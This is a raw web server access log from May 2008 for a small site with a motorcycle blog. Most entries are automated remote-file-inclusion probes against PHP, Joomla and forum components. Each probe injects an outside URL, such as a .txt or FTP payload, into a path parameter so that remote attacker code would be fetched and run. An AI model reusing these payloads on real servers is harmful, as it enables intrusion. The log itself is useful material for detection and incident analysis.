193.202.88.113 - - [03/May/2008:12:43:59 -0700] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
193.202.88.113 - - [03/May/2008:12:43:59 -0700] "GET /logs/access_080304.log//newspublish/include.php?path%5Bdocroot%5D=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
193.202.88.113 - - [03/May/2008:12:43:59 -0700] "GET //newspublish/include.php?path%5Bdocroot%5D=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
193.202.88.113 - - [03/May/2008:12:44:00 -0700] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
64.128.80.104 - - [03/May/2008:12:44:08 -0700] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.museobombeiros.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.128.80.104 - - [03/May/2008:12:44:08 -0700] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.museobombeiros.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.53.137.18 - - [03/May/2008:12:44:15 -0700] "GET /agendax/addevent.inc.php?agendax_path=http://blackcrew.biz/dur.haka?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
72.232.211.138 - - [03/May/2008:12:44:48 -0700] "GET /logs/access_080131.log/main.php?pagina=http://201.6.243.67/UP/xs.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
72.232.211.138 - - [03/May/2008:12:44:48 -0700] "GET /main.php?pagina=http://201.6.243.67/UP/xs.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
72.232.211.138 - - [03/May/2008:12:44:49 -0700] "GET /logs/main.php?pagina=http://201.6.243.67/UP/xs.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
211.233.89.217 - - [03/May/2008:12:45:00 -0700] "GET /logs/access_080308.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
208.100.1.157 - - [03/May/2008:12:46:42 -0700] "GET /logs/access_080218.log//skin/zero_vote/error.php?dir=http://h1.ripway.com/cyber1212/plugin/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
216.227.217.6 - - [03/May/2008:12:46:59 -0700] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.motociclismo.pt/images/banners/canboy? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.227.217.6 - - [03/May/2008:12:46:59 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.motociclismo.pt/images/banners/canboy? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
202.153.103.135 - - [03/May/2008:12:47:02 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.sucs.org/~photo//id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "www.dmulk.com"
202.153.103.135 - - [03/May/2008:12:47:02 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.sucs.org/~photo//id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "www.dmulk.com"
211.115.110.89 - - [03/May/2008:12:47:21 -0700] "GET /logs/access_080215.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.cnm.gob.pe/cnm/cache/tmp0/help01.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
193.34.150.208 - - [03/May/2008:12:47:25 -0700] "GET /logs/access_080215.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://veldega-tour.ru/.log/safe?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
68.165.216.146 - - [03/May/2008:12:47:28 -0700] "GET /logs/access_080225.log/calendar/include.php?path[docroot]=http://finkel.fileave.com/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
68.165.216.146 - - [03/May/2008:12:47:28 -0700] "GET /calendar/include.php?path[docroot]=http://finkel.fileave.com/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
68.165.216.146 - - [03/May/2008:12:47:28 -0700] "GET /logs/calendar/include.php?path[docroot]=http://finkel.fileave.com/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
89.218.85.18 - - [03/May/2008:12:47:49 -0700] "GET /logs/access_080215.log//modules/vwar/admin/admin.php?vwar_root=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.100.1.157 - - [03/May/2008:12:48:02 -0700] "GET /logs/access_071224.log//skin/zero_vote/error.php?dir=http://h1.ripway.com/cyber1212/plugin/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
208.100.1.157 - - [03/May/2008:12:48:02 -0700] "GET //skin/zero_vote/error.php?dir=http://h1.ripway.com/cyber1212/plugin/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
208.100.1.157 - - [03/May/2008:12:48:02 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://h1.ripway.com/cyber1212/plugin/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
200.89.198.133 - - [03/May/2008:12:48:14 -0700] "GET /logs//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://channels.dal.net/racrew/rador.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.89.198.133 - - [03/May/2008:12:48:14 -0700] "GET //administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://channels.dal.net/racrew/rador.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.153.103.135 - - [03/May/2008:12:48:21 -0700] "GET /tellmatic/include/libchart-1.1/libchart.php?tm_includepath=http://www.sucs.org/~photo//id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "www.dmulk.com"
202.153.103.135 - - [03/May/2008:12:48:21 -0700] "GET /logs/tellmatic/include/libchart-1.1/libchart.php?tm_includepath=http://www.sucs.org/~photo//id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "www.dmulk.com"
68.165.216.146 - - [03/May/2008:12:48:46 -0700] "GET /logs/access_080223.log/calendar/include.php?path[docroot]=http://finkel.fileave.com/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
87.242.98.48 - - [03/May/2008:12:49:24 -0700] "GET /logs/browse.php/header.php?prefix=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
70.86.152.130 - - [03/May/2008:12:49:35 -0700] "GET /logs/access_080228.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://areairc.t35.com/new/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
70.86.152.130 - - [03/May/2008:12:49:35 -0700] "GET /logs/access_080228.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://areairc.t35.com/new/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
70.86.152.130 - - [03/May/2008:12:49:35 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://areairc.t35.com/new/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
70.86.152.130 - - [03/May/2008:12:49:35 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://areairc.t35.com/new/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
70.86.152.130 - - [03/May/2008:12:49:35 -0700] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://areairc.t35.com/new/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
70.86.152.130 - - [03/May/2008:12:49:36 -0700] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://areairc.t35.com/new/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
208.100.1.157 - - [03/May/2008:12:49:56 -0700] "GET /logs/access_071225.log//skin/zero_vote/error.php?dir=http://h1.ripway.com/cyber1212/plugin/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
62.219.14.24 - - [03/May/2008:12:50:11 -0700] "GET / HTTP/1.0" 200 11590 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)" "www.dmulk.com"
62.219.14.24 - - [03/May/2008:12:50:19 -0700] "GET /blog/index.php/2008/04/12/great-day-for-a-ride/ HTTP/1.0" 200 10089 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)" "www.dmulk.com"
62.219.14.24 - - [03/May/2008:12:50:24 -0700] "GET /blog/index.php/feed/ HTTP/1.0" 200 6189 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)" "www.dmulk.com"
24.11.142.67 - - [03/May/2008:12:50:24 -0700] "GET / HTTP/1.1" 200 11606 "-" "Mozilla/4.0 (compatible; GoogleToolbar 4.0.1601.4978-big; Windows 6.0; MSIE 7.0.6000.16643)" "www.dmulk.com"
62.219.14.24 - - [03/May/2008:12:50:31 -0700] "GET /blog/index.php/category/motorcycles/ HTTP/1.0" 200 10609 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)" "www.dmulk.com"
208.116.44.60 - - [03/May/2008:12:50:35 -0700] "GET /logs/access_080227.log//newspublish/include.php?path%5Bdocroot%5D=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
208.116.44.60 - - [03/May/2008:12:50:36 -0700] "GET /logs/access_080227.log//newspublish/include.php?path%5Bdocroot%5D=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
208.116.44.60 - - [03/May/2008:12:50:36 -0700] "GET /logs/access_080227.log//newspublish/include.php?path%5Bdocroot%5D=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
62.219.14.24 - - [03/May/2008:12:50:37 -0700] "GET /blog/index.php/2008/04/ HTTP/1.0" 200 10629 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)" "www.dmulk.com"
62.219.14.24 - - [03/May/2008:12:50:39 -0700] "GET /blog/wp-login.php HTTP/1.0" 200 1790 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)" "www.dmulk.com"
62.219.14.24 - - [03/May/2008:12:50:40 -0700] "GET /blog/wp-login.php?action=http%3A%2F%2Fwww.marsbook.co.kr%2Fmain%2Fcreated%2Fproduct%2F2%2Fmumas%2Fohalupa%2F HTTP/1.0" 200 1790 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)" "www.dmulk.com"
62.219.14.24 - - [03/May/2008:12:50:41 -0700] "GET /blog/wp-login.php?action=http%3A%2F%2Fwww.pattibus.it%2Fphplib-7.2b%2Fpages%2Fgodot%2Feridehi%2F HTTP/1.0" 200 1790 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)" "www.dmulk.com"
62.219.14.24 - - [03/May/2008:12:50:42 -0700] "GET /blog/wp-login.php?action=http%3A%2F%2Fwww.pattibus.it%2Fphplib-7.2b%2Fpages%2Fgodot%2Feridehi%2F HTTP/1.0" 200 1790 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)" "www.dmulk.com"
72.232.211.138 - - [03/May/2008:12:50:46 -0700] "GET /logs/main.php?pagina=http://201.6.243.67/UP/xs.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
72.232.211.138 - - [03/May/2008:12:50:47 -0700] "GET /main.php?pagina=http://201.6.243.67/UP/xs.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
62.219.14.24 - - [03/May/2008:12:50:48 -0700] "GET /blog/ HTTP/1.0" 200 11595 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)" "www.dmulk.com"
62.219.14.24 - - [03/May/2008:12:50:54 -0700] "GET /blog/index.php/comments/feed/ HTTP/1.0" 200 896 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)" "www.dmulk.com"
216.70.125.187 - - [03/May/2008:12:50:57 -0700] "GET /logs/access_080215.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.idowebhosting.net/catalog/includes/sys.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
62.219.14.24 - - [03/May/2008:12:50:58 -0700] "GET /blog/index.php/2008/04/03/hello-world/ HTTP/1.0" 200 7172 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)" "www.dmulk.com"
70.86.152.130 - - [03/May/2008:12:51:01 -0700] "GET /logs/access_080121.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://areairc.t35.com/new/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.219.14.24 - - [03/May/2008:12:51:02 -0700] "GET /blog/index.php/2008/04/12/great-day-for-a-ride/feed/ HTTP/1.0" 200 514 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)" "www.dmulk.com"
70.86.152.130 - - [03/May/2008:12:51:02 -0700] "GET /logs/access_080121.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://areairc.t35.com/new/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.70.125.187 - - [03/May/2008:12:51:04 -0700] "GET /logs/access_080215.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.idowebhosting.net/catalog/includes/sys.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
62.219.14.24 - - [03/May/2008:12:51:06 -0700] "GET /blog/index.php/2008/04/12/great-day-for-a-ride/trackback/ HTTP/1.0" 200 10089 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)" "www.dmulk.com"
62.219.14.24 - - [03/May/2008:12:51:07 -0700] "GET /blog/wp-login.php?action=lostpassword HTTP/1.0" 200 1706 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)" "www.dmulk.com"
62.219.14.24 - - [03/May/2008:12:51:11 -0700] "GET /blog/index.php/2008/04/03/hello-world/feed/ HTTP/1.0" 200 895 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)" "www.dmulk.com"
62.219.14.24 - - [03/May/2008:12:51:15 -0700] "GET /blog/index.php/2008/04/03/hello-world/trackback/ HTTP/1.0" 200 7172 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)" "www.dmulk.com"
190.54.28.163 - - [03/May/2008:12:51:19 -0700] "GET /logs//main.php?sayfa=ftp://84.32.137.157/incoming/upload/trex/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
190.54.28.163 - - [03/May/2008:12:51:28 -0700] "GET //main.php?sayfa=ftp://84.32.137.157/incoming/upload/trex/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.118.85.12 - - [03/May/2008:12:51:41 -0700] "GET /logs/access_080215.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.idowebhosting.net/catalog/includes/sys.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
211.115.110.89 - - [03/May/2008:12:52:12 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.cnm.gob.pe/cnm/cache/tmp0/help01.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
83.103.23.40 - - [03/May/2008:12:52:29 -0700] "GET /logs/index.php3?p=ftp://128.175.10.3/incoming/smile04.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.103.23.40 - - [03/May/2008:12:52:30 -0700] "GET /logs/index.php3?p=ftp://128.175.10.3/incoming/smile01.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.103.23.40 - - [03/May/2008:12:52:30 -0700] "GET /index.php3?p=ftp://128.175.10.3/incoming/smile04.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.103.23.40 - - [03/May/2008:12:52:31 -0700] "GET /index.php3?p=ftp://128.175.10.3/incoming/smile01.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.118.85.12 - - [03/May/2008:12:52:56 -0700] "GET /logs/access_080215.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.idowebhosting.net/catalog/includes/sys.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
193.202.88.113 - - [03/May/2008:12:53:01 -0700] "GET /logs/access_080227.log//newspublish/include.php?path%5Bdocroot%5D=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
193.202.88.113 - - [03/May/2008:12:53:01 -0700] "GET /logs/access_080227.log//newspublish/include.php?path%5Bdocroot%5D=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
193.51.215.1 - - [03/May/2008:12:53:01 -0700] "GET /logs//accounts/inc/include.php?language=0&lang_settings[0][1]=http://sulawesi.us/xpl/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
193.51.215.1 - - [03/May/2008:12:53:02 -0700] "GET //accounts/inc/include.php?language=0&lang_settings[0][1]=http://sulawesi.us/xpl/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
211.115.110.89 - - [03/May/2008:12:53:02 -0700] "GET //modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.cnm.gob.pe/cnm/cache/tmp0/help01.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
211.115.110.89 - - [03/May/2008:12:53:02 -0700] "GET /logs//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.cnm.gob.pe/cnm/cache/tmp0/help01.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
211.115.110.89 - - [03/May/2008:12:53:02 -0700] "GET /logs/access_080215.log//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.cnm.gob.pe/cnm/cache/tmp0/help01.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
193.202.88.113 - - [03/May/2008:12:53:09 -0700] "GET /logs/access_080227.log//newspublish/include.php?path%5Bdocroot%5D=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
64.118.85.12 - - [03/May/2008:12:53:12 -0700] "GET /logs/access_080215.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.idowebhosting.net/catalog/includes/sys.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
213.246.61.4 - - [03/May/2008:12:53:21 -0700] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.parkliv.nu/components/%20%20%20/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.dmulk.com"
213.246.61.4 - - [03/May/2008:12:53:22 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.parkliv.nu/components/%20%20%20/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.dmulk.com"
64.118.85.12 - - [03/May/2008:12:53:22 -0700] "GET /logs/access_080215.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.idowebhosting.net/catalog/includes/sys.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
64.118.85.12 - - [03/May/2008:12:54:18 -0700] "GET /logs/access_080218.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.ride2eat.com/calendar/albo/alba.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
64.118.85.12 - - [03/May/2008:12:54:18 -0700] "GET /logs/access_080218.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.ride2eat.com/calendar/albo/alba.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
64.118.85.12 - - [03/May/2008:12:54:18 -0700] "GET /logs/access_080218.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.ride2eat.com/calendar/albo/alba.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
193.164.131.35 - - [03/May/2008:12:54:27 -0700] "GET /logs//index.php?option=com_virtuemart&page=shop.browse&category_id=3&Itemid=1&mosConfig_absolute_path=http://www.folgoreclan.com/ex/controllo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
193.164.131.35 - - [03/May/2008:12:54:30 -0700] "GET /logs/access_080215.log//index.php?option=com_virtuemart&page=shop.browse&category_id=3&Itemid=1&mosConfig_absolute_path=http://www.folgoreclan.com/ex/controllo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
193.164.131.35 - - [03/May/2008:12:54:30 -0700] "GET //index.php?option=com_virtuemart&page=shop.browse&category_id=3&Itemid=1&mosConfig_absolute_path=http://www.folgoreclan.com/ex/controllo.txt? HTTP/1.1" 200 11606 "-" "libwww-perl/5.803" "www.dmulk.com"
211.115.110.89 - - [03/May/2008:12:55:03 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.cnm.gob.pe/cnm/cache/tmp0/help01.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
211.115.110.89 - - [03/May/2008:12:55:03 -0700] "GET /logs/access.log//components/com_simpleboard/image_upload.php?sbp=http://www.cnm.gob.pe/cnm/cache/tmp0/help01.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
211.115.110.89 - - [03/May/2008:12:55:26 -0700] "GET /logs/access_071219.log//components/com_simpleboard/image_upload.php?sbp=http://www.cnm.gob.pe/cnm/cache/tmp0/help01.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
89.218.85.18 - - [03/May/2008:12:56:22 -0700] "GET /logs/access_080324.log//skin/zero_vote/error.php?dir=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.218.85.18 - - [03/May/2008:12:56:23 -0700] "GET //skin/zero_vote/error.php?dir=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.218.85.18 - - [03/May/2008:12:56:23 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
210.192.125.88 - - [03/May/2008:12:56:25 -0700] "GET /modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://watchvitality.com/v1/sefe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
208.100.1.157 - - [03/May/2008:12:56:27 -0700] "GET /logs/access_080218.log//skin/zero_vote/error.php?dir=http://h1.ripway.com/XdedzX1212/plugin/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
213.246.51.45 - - [03/May/2008:12:57:10 -0700] "GET /logs/agendax/addevent.inc.php?agendax_path=http://www.motociclismo.pt/images/banners/canboy? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.246.51.45 - - [03/May/2008:12:57:10 -0700] "GET /agendax/addevent.inc.php?agendax_path=http://www.motociclismo.pt/images/banners/canboy? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.53.137.18 - - [03/May/2008:12:57:20 -0700] "GET /logs/home.php?content=http://blackcrew.biz/dur.haka?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
74.53.137.18 - - [03/May/2008:12:57:21 -0700] "GET /home.php?content=http://blackcrew.biz/dur.haka?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
89.218.85.18 - - [03/May/2008:12:57:28 -0700] "GET /logs/access_080129.log//skin/zero_vote/error.php?dir=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.44.212.95 - - [03/May/2008:12:57:59 -0700] "GET /logs/access_080215.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://BGSro.go.ro/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
74.52.230.50 - - [03/May/2008:12:58:24 -0700] "GET /logs/access_080215.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.idowebhosting.net/catalog/includes/sys.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
74.52.230.50 - - [03/May/2008:12:58:24 -0700] "GET /logs/access_080215.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.thenationalcouncil.com/webcalendar/tools/alba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
74.52.230.50 - - [03/May/2008:12:58:27 -0700] "GET /logs/access_080215.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.idowebhosting.net/catalog/includes/sys.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
